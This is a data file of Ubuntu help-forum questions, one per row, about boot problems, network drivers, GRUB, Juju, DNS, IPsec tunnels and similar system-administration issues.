433838	newbie problem : black screen from live cd ; old pc	equipment : 12 year old sony vaio pcv-rx741 desktop ; amd athlon @ 1.53 ghz ; 1 gb ram ; awardbios 1003vx . used daily for the last 5 years as my principle business machine . background : have used xp on this machine since new , very few problems to date . tried dsl years ago mainly because it was the only distro i could download by dial up . about 4 years ago i installed a dual boot setup w/opensuse , no installation problems , i just did n't like the distro , could not see a benefit for me over xp . i later wiped it out with the only necessary re-installation of windows on this machine . objective : i am trying to try or install lubuntu 13.10 from a live cd . yesterday i was trying with xubuntu 13.10 with similar results . also tried peppermint 4 from a usb with worse results . problem : during boot , blue `` lubuntu '' screen is present for an extended period of time , then is replaced by a black `` lubuntu '' screen for a shorter time . screen then goes completely black , followed by the mouse pointer appearing ( and functioning [ usb mouse ] ) . then screen goes black again , and the following message appears : `` starting mount network filesystems [ ok ] stopping mount network filesystems [ ok ] '' once the message disappears the screen begins alternating between a non working mouse pointer , a black screen , and a rapid spasm of 2 rows of forward slashes . i have tried all of the f6 boot options in various combinations to no avail . this live cd functions flawlessly on my 5 year old sony windows 7 laptop , as did the xubuntu live cd and various and sundry unetbootin usb distros i have tried with the exception of manjaro . thank you for your time .
433839	how do i change the font colours for grub ?	i managed to change the background on the boot screen and now i need to set the font colours to something i can read . i 've been lurking around the ubuntu forums and the ask site and i 've also tried with the grub-customizer with no luck . all i need is the right code for grub file . here 's a copy of my current grub : grub_default= '' saved '' grub_savedefault= '' true '' # grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 10 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' grub_background= '' /home/autumn/pictures/grub/suckng.jpg '' menu_color_normal=black/black menu_color_highlight=yellow/dark-gray color_normal=black/black color_higlight=black/black
433842	how to resolve `` error machine is already provisioned '' in manual provision set up ?	i set up a manually provisioned environment successfully ( in local network among x3 12.04 ubuntu servers . ) however adding the second machine failed twice . after the third try ( installed missing dependency ) their remained x2 'pending ' machines . i tried destroy-machines on those , than used destroy-environment to try and start over . now when i add machine i get : error machine is already provisioned . i have tried uninstalling/re-installing along with removing all juju files in ~/.juju . any ideas on how to start over or remove the provisioning ? thanks !
433845	wired connection problem for ubuntu 13.10 using dell vostro	i am having a problem using wired connection for ubuntu 13.10 . the problem started suddenly . however i was able to solve it using the answer given in the following post : ubuntu 12.04 dell 6400 no network it worked perfectly . but now again i am unable to connect to the internet . i tried using the same solution but it was of no use . i have reinstalled the driver for realtek ethernet controller ( r8168 ==the latest version ) using the answer given in this post : wifi and ethernet connectivity problems after upgrading to 12.04 but these solutions are not solving my problem . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - sudo ifconfig : eth0 link encap : ethernet hwaddr b8 : ac:6f:76 : c1:2c up broadcast multicast mtu:1500 metric:1 rx packets:985 errors:0 dropped:0 overruns:0 frame:0 tx packets:1351 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:95359 ( 95.3 kb ) tx bytes:149074 ( 149.0 kb ) interrupt:46 base address:0xa000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1032 errors:0 dropped:0 overruns:0 frame:0 tx packets:1032 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:89902 ( 89.9 kb ) tx bytes:89902 ( 89.9 kb ) wlan0 link encap : ethernet hwaddr 20:7c:8f:10:08 : d0 inet addr:192.168.43.74 bcast:192.168.43.255 mask:255.255.255.0 inet6 addr : fe80 : :227c:8fff : fe10:8d0/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:15527 errors:0 dropped:0 overruns:0 frame:0 tx packets:16374 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:10844956 ( 10.8 mb ) tx bytes:2728215 ( 2.7 mb ) ===================================================================== lsmod |grep r8168 r8168 387138 0 ============================================================================ dmesg |tail [ 3140.976810 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 3156.224464 ] cfg80211 : calling crda to update world regulatory domain [ 3156.233144 ] cfg80211 : world regulatory domain updated : [ 3156.233152 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 3156.233156 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 3156.233161 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 3156.233164 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 3156.233168 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 3156.233172 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 3171.265877 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready
433847	how to install rt73usb in ubuntu server 12.04.4 ?	how can i install rt73 on ubuntu server 12.04.4 lts ? i have installed ubuntu server on an old laptop ( advent 7109b ) and wireless is not working by default due to missing drivers . i found online i needed rt73 . lsmod | grep rt gives me this : rt73usb 31360 0 rt2x00usb 20161 1 rt73usb rt2x00lib 53673 2 rt73usb , rt2x00usb mac80211 534884 2 rt2x00usb , rt2x00lib cfg80211 416271 2 rt2x00lib , mac80211 parport 40930 1 lp crc_itu_t 12627 2 rt73usb , firewire_core i have ssh access to it by having the laptop plugging in via ehternet . any ideas how i can get wifi working ? edit : here are results from terdon 's comment : iwconfig : wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : on lo no wireless extensions . eth0 no wireless extensions . /sbin/iwlist wlan0 scan : wlan0 failed to read scan data : network is down lspci | grep net returns nothing .
433848	which version of ubuntu suites for an old pc	spoiler alter : i know that most of your phones have more ram than these pc 's that i have at home but well ... . i thought it 'd be nice if i could find some use for it ... as in install a version of open office that is better than office 2000 : d here are the specs for my old pcs : pc1 256mb ram intel ( r ) pentium ( r ) 4 cpu 1.80ghz windows 98 second edition 32 bit 20gb hard disk pc2 256mb ram amd sempron ( tm ) processor 2800+ 1599mhz windows me , 32 bit , 40gb hard disk would be great if you 'll could possibly suggest the version of ubuntu that would be best suited for these pcs that are lying around at home : d
433849	after partitioning space to my ubuntu partition , nothing updates	right now , i have ubuntu 13.04 , and using sudo-apt-get dist-upgrade does not get me the 13.10 update . whenever i sudo-apt-update or upgrade lately , i get : 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . it has been for a couple of months ( i 'm not actually sure , but it has been a long time ) , and i want to fix this somehow . edit : from sudo cat /etc/apt/sources.list edit 2 : from sudo vim /etc/apt/sources.list to comment out the last two lines edit 3 : i found out the problem on my own . # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ raring main multiverse restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates main multiverse restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring universe deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring-backports main universe multiverse restricted deb http : //security.ubuntu.com/ubuntu raring-security main multiverse restricted deb http : //security.ubuntu.com/ubuntu raring-security universe # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main # # deb http : //www.duinsoft.nl/pkg debs all # # deb http : //ppa.launchpad.net/person/ppa/ubuntu karmic main
433850	flash player is not working probably	am new at ubuntu . i downloaded flash plugin for my ubuntu , and install it from the terminal but it does not play the movie on youtube it seams installed , and there is sound and the first picture is there . and when i installed the libflashplayer.so , and in terminal i type : # rah -uvh libflashplayer.so . i tried several times and it seems installed but those are not working probably . can some one please help me ?
433855	how to make custom refresh rate stay saved ?	i 'm testing out 14.04 on a partition to see if i want to use it as my main desktop for when it 's fully released , but i 've encountered some problems . i have a 144hz monitor , so in the the nvidia x server settings window i set the refresh rate to 144hz and it works just fine . however , when i restart my computer those settings revert back to `` auto '' and i have to reset the refresh rate back to 144hz each time i log into ubuntu . how do i make the nvidia settings stay set to 144hz ? the refresh rate settings also revert back to auto every time i go into full screen in minecraft . i 've searched google and ca n't seem to find any solution to these problems . i 'm not open to any lectures about how 144hz is pointless because the eye supposedly ca n't see a difference beyond a certain refresh rate , so if you intend to lecture me on that incorrect knowledge then please be gone .
433857	windows 7 install usb wo n't boot after installing ubuntu	i have replaced windows 8 with ubuntu 13.10 and now i am trying to install windows 7 from a usb but it wo n't boot . when i choose to boot from my usb it gives an error : this is not a bootable device . insert a bootable floppy and press any key . the usb was made in the built-in startup disk creator in ubuntu .
433861	lshw not showing individual memory bank info	this is all i get : sudo lshw -c memory *-memory description : system memory physical id : 0 size : 7981mib sudo lshw does n't give any more info . lshw used to show individual memory banks . what am i doing wrong ?
433866	command with backticks and percentages not running in crontab	the following crontab does not work : # test line does dot run */1 * * * * /bin/echo 'test '`/bin/date + % y- % m- % d` > > /tmp/test i also tried starting it with : shell=/bin/bash update : i thought the backtick characters ` were the villains , but as the answer below clarifies the percentage % was the culprit !
433868	my laptop wo n't boot after fresh-install	after a fresh install of ubuntu 12.04 ( or any other version of ubuntu ) , my laptop never boot i tried to fix boot with boot repair but nothing fix my problem . after having run boot repair , i got this log . please help me .
433869	i just installed ubuntu on my yoga 2 pro and i am looking to manually adjust the screen resolution	this was my installation method . strung together from various sources . steps i followed to install ubuntu on my lenovo yoga 2 pro
433871	not yet another question about truecrypt on usb !	everybody , after reading a few topics on this forum , and the truecrypt documentation , i still ca n't understand how to achieve my objective : to encrypt data on a usb device and use it on any computer where : they do n't have truecrypt installed i do n't have admin privileges ( i do have admin privileges on my own computer , which i am trying to use to create such volume/file ) . after creating an encrypted file container on the usb , i have copied the truecrypt executable file on it . of course , i can not run it from another computer , as i do not have admin privileges . on the truecrypt documentation they talk about using tools -- > traveler disk setup which i do not seem able to find anywhere when launching the program . is there any way to achieve my objective ? thanks , max
433875	unable to to make a tunnel between two hosts	i am very new in ubuntu and openswan . i have two virtual machines with ubuntu 10.4 . i have also checked to see if eth0 is bridge or not ( it is not part of bridge ) . i want to make a tunnel between these two virtual machines . the ipsec.conf is as follows after configuration : # /etc/ipsec.conf - openswan ipsec configuration file # rcsid $ id : ipsec.conf.in , v 1.16 2005/07/26 12:29:45 ken exp $ # this file : /usr/share/doc/openswan/ipsec.conf-sample # # manual : ipsec.conf.5 version 2.0 # conforms to second version of ipsec.conf specification # basic configuration config setup # do not set debug options to debug configuration issues ! # plutodebug / klipsdebug = `` all '' , `` none '' or a combation from below : # `` raw crypt parsing emitting control klips pfkey natt x509 dpd private '' # eg : # plutodebug= '' control parsing '' # # enable to get logs per-peer # plutoopts= '' -- perpeerlog '' # # again : only enable plutodebug or klipsdebug when asked by a developer # # nat-traversal support , see readme.nat-traversal # plutodebug / klipsdebug = `` all '' , `` none '' or a combation from below : # `` raw crypt parsing emitting control klips pfkey natt x509 dpd private '' # eg : # plutodebug= '' control parsing '' # # enable to get logs per-peer # plutoopts= '' -- perpeerlog '' # # again : only enable plutodebug or klipsdebug when asked by a developer # # nat-traversal support , see readme.nat-traversal nat_traversal=yes # exclude networks used on server side by adding % v4 : ! a.b.c.0/24 virtual_private= % v4:10.0.0.0/8 , % v4:192.168.0.0/16 , % v4:172.16.0.0/12 # oe is now off by default . uncomment and change to on , to enable . oe=off # which ipsec stack to use . netkey , klips , mast , auto or none protostack=netkey # add connections here # sample vpn connection # for more examples , see /etc/ipsec.d/examples/ conn test left=192.168.222.138 leftsubnet=172.16.2.0/24 leftrsasigkey=0saqozbyidugh+pd3iwd7goonflutkokkrwc vznunsts9el6uw8ujcwbcgffmcxrpc2bqhztwd $ leftnexthop= % defaultroute right=192.168.222.137 rightsubnet=172.16.1.0/24 rightrsasigkey=0saqozbyidugh+pd3iwd7goonflutkokkrw cvznunsts9el6uw8ujcwbcgffmcxrpc2bqhztw $ rightnexthop= % defaultroute auto=add and the following for the other one : conn test left=192.168.222.137 leftsubnet=172.16.1.0/24 leftrsasigkey=0saqnzancbayxz1u6qz7q602f7d6ec5jg8is p2gjlryqwqgips2xvudrwcx/slumgmzuvzrrwe $ leftnexthop= % defaultroute right=192.168.222.138 rightsubnet=172.16.2.0/24 rightrsasigkey=0saqnzancbayxz1u6qz7q602f7d6ec5jg8i sp2gjlryqwqgips2xvudrwcx/slumgmzuvzrrw $ rightnexthop= % defaultroute auto=add i added the routes and determined the interface on both machines with the following command : root @ ubuntu : /etc # ifconfig eth0:0 172.16.2.1 netmask 255.255.255.0 root @ ubuntu : /etc # route add 172.16.2.1 eth0:0 root @ ubuntu : /etc # route add -net 172.16.1.0 netmask 255.255.255.0 gw 172.16.2.1 but after adding and setting up the tunnel i got : root @ ubuntu : /etc # ipsec auto -- add test root @ ubuntu : /etc # ipsec auto -- up test 104 `` test '' # 1 : state_main_i1 : initiate 003 `` test '' # 1 : received vendor id payload [ openswan ( this version ) 2.6.23 ] 003 `` test '' # 1 : received vendor id payload [ dead peer detection ] 003 `` test '' # 1 : received vendor id payload [ rfc 3947 ] method set to=109 106 `` test '' # 1 : state_main_i2 : sent mi2 , expecting mr2 003 `` test '' # 1 : nat-traversal : result using rfc 3947 ( nat-traversal ) : no nat detected 108 `` test '' # 1 : state_main_i3 : sent mi3 , expecting mr3 003 `` test '' # 1 : ignoring informational payload , type invalid_key_information msgid=00000000 003 `` test '' # 1 : received and ignored informational message 003 `` test '' # 1 : discarding duplicate packet ; already state_main_i3 010 `` test '' # 1 : state_main_i3 : retransmission ; will wait 20s for response 003 `` test '' # 1 : ignoring informational payload , type invalid_key_information msgid=00000000 003 `` test '' # 1 : received and ignored informational message 003 `` test '' # 1 : discarding duplicate packet ; already state_main_i3 010 `` test '' # 1 : state_main_i3 : retransmission ; will wait 40s for response 003 `` test '' # 1 : ignoring informational payload , type invalid_key_information msgid=00000000 003 `` test '' # 1 : received and ignored informational message 031 `` test '' # 1 : max number of retransmissions ( 2 ) reached state_main_i3 . possible authentication failure : no acceptable response to our first encrypted message 000 `` test '' # 1 : starting keying attempt 2 of an unlimited number , but releasing whack
433880	how to install cpu-g on ubuntu	how to install cpu-g on ubuntu , so i can use it to view information about my desktop hardware .
433893	how to recover data lost when connecting a usb drive to a virtualbox vm	i have just installed/configured my machine to run ubuntu 13.10 , with windows 8 running in a virtual machine on virtualbox 4.2.16_ubuntu r86992 . i was just experimenting with mounting and unmounting an external hard drive which has a fat32 filesystem . everything seemed to work ... the drive could be mounted and unmounted in the vm , and i could see on ubuntu that it was also mounting and unmounting . however , then i tried to access a folder in ubuntu , and it appeared empty . so i clicked on another folder , to see if it was also empty , and it was . i tried a couple more , and they appeared empty . none of these should have been empty . then i tried to connect the drive to a different physical windows laptop . it appeared that every folder that i had clicked on in ubuntu was empty ! i 'm scared to try access this drive from ubuntu again , and i do n't know what could have caused this to happen . ( the drive is fat32 . ) is there any way to recover my data ? is there any way to prevent this happening again ? any advice would be greatly appreciated .
433894	install the drivers for the built in blueray /dvd drive and other such hardware on my laptop ?	if i install ubuntu will i need to install the drivers for the built in blueray /dvd drive and other such hardware on my laptop ?
433895	gnome crashed on ubuntu while updating	after i 've installed opencv and after updating/upgrading apt-get , gnome crashed . i was wondering how can i fix/reinstall/repair gnome . best regards
433898	cant get ubuntu usb to boot	i recently had linux mint installed on my new laptop with windows 8.1 . i had problems booting to mint so i installed refind and managed to get windows and l+mint to boot correctly . i decided i wanted to install ubuntu instead of mint so i deleted the partition with mint and tried to install ubuntu but everytime i try to boot ubuntu from my usb it sends me to busybox saying : mount : mounting dev/loop0 on //filesytem.squashfs ... i read that it was probably a bad download and redownloaded again , but im still getting the same error .
433902	bootstrapping juju gives `` '' error could not access file '*-provider-state ' gomaasapi : got error back from server : 403 forbidden . ''	we are trying to bootstrap juju onto another machine in the maas cloud but are getting a `` error could not access file *-provider-state gomaasapi : got error back from server : 403 forbidden . '' error . when we run juju bootstrap a .jenv file is created and this error is returned with the * in the '*-provider-state ' replaced by the juju agent name of the maas node . when we delete the environment ( by deleting the .jenv file ) , the same error is returned but filename just listed jsut as 'provider-state ' . the node does not move into allocated state even if the .jenv file is created . running anything - juju bootstrap , juju status , juju destroy-environment , gives the same error . backstory : there used to be a bootstrapped juju environment existing on this maas server previously . we had to change our network configurations , and could n't get the allocated node to be deleted . so , we thought we could unistall juju and start over . clearly , it did n't work and there are some links left of it still on our server . how do we get rid of it ? we did get the allocated node deleted using the maas shell but this error still persists . we are running maas 12.04 lts , juju 1.16 .
433906	ubuntu 12.04 lts wifi works fine for install but once i reboot i get hardware switch is turned off	i am installing ubuntu 12.04 lts on an asus laptop . at the beginning of the install it recognizes my wireless adapter and i am able to connect . everything works fine all the way through the install . it is only once i reboot that the wifi breaks . i have done this several times and actually left it without rebooting for hours and it works fine . but as soon as i reboot -- nothing . it is like a cant activate it at all . it says something like network is disabled by hardware switch . the wireless is atheros ar9485 with driver ath9k . fn + f2 does not work at all . sudo rfkill list shows the phys wireless lan as hard blocked sudo rfkill unblock all does not change anything i have tried some of the other suggestions on this site with no luck . the one i have not tried is backporting the driver any help would be much appreciated . **lshw** output for wireless card *-network description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 24:0a:64 : c3:73 : ef width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.11.0-18-generic firmware=n/a ip=10.0.0.5 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn **uname -r** returned 3.11.0-18-generic
433908	why would having multiple nameservers in resolv.conf cause nslookup to fail , but a single entry work ?	i have a resolv.conf on ubuntu 12.04 that looks like this ( ip addresses have been changed to nonsense ) : search internal.mydomain.com nameserver 205.169.169.193 that nameserver is not authoritative for mydomain.com , but does contain valid records for internal.mydomain.com . i can issue both host and nslookup queries with this resolv.conf without issue : $ host myserver myserver.internal.mydomain.com has address 10.1.1.3 $ nslookup myserver server : 205.169.169.193 address : 205.169.169.193 name : myserver.internal.mydomain.com address : 10.1.1.3 everything works great , but that nameserver lives in aws 's route53 ca n't recurse , so it ca n't resolve , say , google.com . so i added another nameserver . specifically , the stock aws nameserver used by my ubuntu image on instantiation . i know it works just fine : search internal.mydomain.com nameserver 205.169.169.193 nameserver 172.152.152.112 now , when i run nslookup , it queries the first nameserver , as i 'd expect , but fails to find the record , moving onto the 172 . * server : $ nslookup myserver ; ; got recursion not available from 205.169.169.193 , trying next server ; ; got recursion not available from 205.169.169.193 , trying next server server : 172.152.152.112 address : 172.152.152.112 # 53 ** server ca n't find myserver : nxdomain i 'm puzzled . why does resolv.conf behave correctly when i have a single nameserver record , but incorrectly when i have more than one ? notably this works as i 'd expect it on amazon 's linux , v3.4.73-64.112.amzn1.x86_64 ( mockbuild @ gobi-build-31003 ) . is this a bug in ubuntu 12.04 ?
433909	unable to connect to the internet through my ubuntu 13.10	unable to connect to the internet through my ubuntu 13.10 lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation mobile pm965/gm965/gl960 memory controller hub [ 8086:2a00 ] ( rev 03 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) [ 8086:2a02 ] ( rev 03 ) 00:02.1 display controller [ 0380 ] : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) [ 8086:2a03 ] ( rev 03 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 [ 8086:2834 ] ( rev 03 ) 00:1a.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 [ 8086:2835 ] ( rev 03 ) 00:1a.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 [ 8086:283a ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801h ( ich8 family ) hd audio controller [ 8086:284b ] ( rev 03 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 1 [ 8086:283f ] ( rev 03 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 2 [ 8086:2841 ] ( rev 03 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 3 [ 8086:2843 ] ( rev 03 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 [ 8086:2830 ] ( rev 03 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 [ 8086:2831 ] ( rev 03 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 [ 8086:2832 ] ( rev 03 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 [ 8086:2836 ] ( rev 03 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev f3 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801hm ( ich8m ) lpc interface controller [ 8086:2815 ] ( rev 03 ) 00:1f.1 ide interface [ 0101 ] : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller [ 8086:2850 ] ( rev 03 ) 00:1f.2 ide interface [ 0101 ] : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ide mode ] [ 8086:2828 ] ( rev 03 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 82801h ( ich8 family ) smbus controller [ 8086:283e ] ( rev 03 ) 02:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8039 pci-e fast ethernet controller [ 11ab:4353 ] ( rev 15 ) 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 )
433910	ruby installation in ubuntu virtualbox vanishes after every reboot	i installed ruby and rails in ubuntu ( guest os ) which is mounted on windows ( host os ) using virtual box . but every time i reboot guest os , i need to re install ruby on rails.i have some experience with virtualbox & ubuntu . even after installing ruby and rails in same same session ( without rebooting guest os ) if i open a different terminal and type ruby -- version or irb commands it asks me to install ruby using sudo apt-get install . how can i solve this install ruby and rails permanently in ubuntu ( guest os ) ? thanks in advance .
433911	how to change the permission on a single file ?	i need to change the permission on a couple of files in the /usr/share/backgrounds/ . i 've been lurking around forums but no one will give me a straight answer . rather , they just keep warning me against it . the files in question are two images , lets say , img1.jpg and img2.jpg . all i want to do is set their `` other '' permission from `` none '' to `` read-only '' .
433912	remember wireless password in kde	i 've got kubuntu 12.04.3 lts installed . do n't know why - whether it 's a default option or i 've made this - but kde always keeps asking me for the wireless connection password and it 's annoying a little bit . each time i reboot i have to enter kde wallet password . what can i do to grant access to the kde wallet for the wireless network manager ?
433913	why ca n't i see eth0 on my ubuntu 12.04 server ?	i 've just install ubuntu 12.04 server on virtualbox through my windows 7 pc . when i try to give my server an ip address through /etc/network/inferfaces , i first to need make sure eth0 is there correct ? and when i check for eth0 , i do n't have one when i go through ifconfig . i only see lo and virbr0 . commands like auto eth0 does n't work . i 'm a total newb to linux command system . someone please enlighten me .
433914	how to install a linux kernel or the `` linux '' meta-package without linux-image-extra package ?	in the quest for installation of a low disk space consuming ubuntu installation , there is a need to install a linux kernel or the `` linux '' meta-package without the linux-image-extra package and its dependencies . the sytem has got no wireless connectivity , that is why we do n't need a the linux-image-extra package and only one of the reason why we do n't want the linux-image-extra package . the difference between running apt-get install linux- { headers , image } -generic and apt-get install linux- { headers , image } -3.11.0-18 { , -generic } are these packages : package installed size -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- crda 96,0 kb iw 149,0 kb libnl-3-200 158,0 kb libnl-genl-3-200 58,0 kb libssl1.0.0 2.931,0 kb linux-firmware 47.622,0 kb linux-headers-generic 33,0 kb linux-image-extra-3.11.0-18-generic 141.158,0 kb linux-image-generic 33,0 kb wireless-regdb 52,0 kb -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- total 192.290,0 kb however when running the apt-get install linux- { headers , image } -3.11.0-18 { , -generic } command , the grub menu does n't contain the kernel . in fact the chrooted grub-update runs without any error message but does n't seem to be able to detect the newly installed kernel . maybe due to a `` /usr/sbin/grub-probe : error : can not find a grub drive for . check your device.map . '' error message in the output of ./etc/grub.d/10_linux . however having to update grub manually is acceptable . that can even save a few more packages , like `` dmsetup '' , `` os-prober '' etcetera . how to install a ubuntu linux kernel or the ubuntu `` linux '' meta package without the linux-image-extra-x.y.z-generic package ?
433918	enable alt-drag	i am very used to alt-drag for moving and resizing windows . however , i ca n't get it to work in xubuntu 13.10 . ( i just recently installed it in a virtual box machine ) . if i change it to a different key ( shift for example ) , shift-drag works as expected . when it is set up to use alt , and i press the alt key , it activates the menu shortcuts , but does n't drag or resize windows if i click . edit : yes , that sounds like exactly the setting i need to change . however , when i pull up the keyboard settings , that tab is n't there . i 'm using xubuntu 13.10 . so where else might that setting live ?
433919	where does the shell fall into the process hierarchy ?	when you open a new terminal , it becomes the parent process of all processes forked within it . but where does the bash shell , for example , fall into this process chain ? is its parent the terminal ? are all processes forked within the shell children of the shell ? if so , then when i change shells , why do the processes still remain running ? in short , where does the shell fall in the process hierarchy ?
433922	i cant ping my domain from outside	i ca n't ping my domain from outside my vps . i tried in cmd.exe - > ping domain.com but i didnt get any answer . but when i try via putty console i can do it : ; < < > > dig 9.8.1-p1 < < > > hungis.com ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 5798 ; ; flags : qr aa rd ra ; query : 1 , answer : 0 , authority : 1 , additional : 0 ; ; question section : ; hungis.com . in a ; ; authority section : hungis.com . 1440 in soa ns1.hungis.com . admin.hungis.com . 201006601 7200 120 2419200 604800 ; ; query time : 0 msec ; ; server : 176.56.237.14 # 53 ( xxx.xx.xxx.xx ) ; ; when : thu mar 13 16:12:25 2014 ; ; msg size rcvd : 74 nslookup ns2 server : xxx.xx.xxx.xx address : xxx.xx.xxx.xx # 53 name : ns2.hungis.com address : xxx.xx.xxx.xx .arpa file : $ ttl 14400 @ in soa ns1.hungis.com . admin.hungis.com . ( 2010081401 28800 604800 604800 86400 ) in ns ns1.hungis.com . in ns ns2.hungis.com . 176 in ptr hungis.com . 176 in ptr ns1.hungis.com . 176 in ptr ns2.hungis.com . .db file : $ ttl 1440 @ in soa ns1.hungis.com . admin.hungis.com . ( 201006601 7200 120 2419200 604800 ) ; hungis.com . in ns ns1.hungis.com . hungis.com . in ns ns2.hungis.com . www in cname hungis.com . ns1 in a xxx.xx.xxx.xx ns2 in a xxx.xx.xxx.xx resolv.conf : search hungis.com . nameserver xxx.xx.xxx.xx /etc/hosts : 127.0.0.1 localhost.localdomain localhost # auto-generated hostname . please do not remove this comment . xxx.xx.xxx.xx hungis.com : :1 localhost ip6-localhost ip6-loopback update : i modified my hostname file ( of course save it ) for the current hostname then i tried to refresh it without rebooting and i got this reply : sudo service networking restart sudo : unable to resolve host mbcloud // this is my old hostname stop : unknown instance : networking stop/waiting it refers to my old hostname , how is it possible if i delete it and type another hostname ? what is the problem ?
433924	package denyhosts in ubuntu trusty tahr is deleted : temporary or forever ?	while doing a test-upgrade of our ubuntu server to 14.04 , i found that the package denyhosts is no longer available . installing it gives following error : apt-get install denyhosts reading package lists ... done building dependency tree reading state information ... done e : unable to locate package denyhosts apparently it has been deleted , according to launchpad . will denyhosts be available in the final release of ubuntu 14.04 ?
433929	in sysctl.conf settings , what is the difference between 'all ' & 'default ' ?	in context of sysctl.conf settings , what is the difference between ( all vs. default ) like net.ipv4.conf.all.accept_source_route & net.ipv4.conf.default.accept_source_route in sysctl settings ? if i added all value , is it necessary to add default value as well ? using ubuntu 12.04 lts
